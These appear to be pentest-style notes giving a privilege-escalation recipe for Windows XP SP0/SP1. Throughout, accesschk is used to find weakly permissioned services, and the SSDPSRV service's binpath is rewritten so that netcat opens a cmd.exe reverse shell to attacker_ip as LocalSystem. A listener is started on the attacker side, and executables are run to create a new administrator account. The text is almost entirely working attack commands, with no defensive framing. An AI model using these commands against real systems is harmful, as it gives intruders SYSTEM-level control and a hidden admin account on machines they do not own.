EoP for WinXP SP0, SP1

Notes

• Use accesschk to check services with RW access
• Either upnphost or SSDPSRV

Put accesschk to victim

• cd C:\Inetpub\wwwroot\winxp

Check for insecure services

• accesschk users -cw * /accepteula
• accesschk.exe -uwcqv "Authenticated Users" * /accepteula
• accesschk users -cuwcqv * /accepteula

Change sc to create reverse shell to attacker

• sc config SSDPSRV binpath= "C:\Inetpub\wwwroot\nc.exe -nv attacker_ip 9988 -e C:\WINDOWS\System32\cmd.exe"
• sc config SSDPSRV depend= ""
• sc config SSDPSRV obj= ".\LocalSystem" password= ""
• sc qc SSDPSRV
• sc config SSDPSRV start= auto
• net start SSDPSRV

Listen on attacker

• nc -nlvp 9988

Attacker to execute exe to create new admin user

• Create c files to create new admin user
• Convert c files to exe files
• Run C:\Inetpub\wwwroot\addnewuser.exe
• Run C:\Inetpub\wwwroot\addusertoAdmin.exe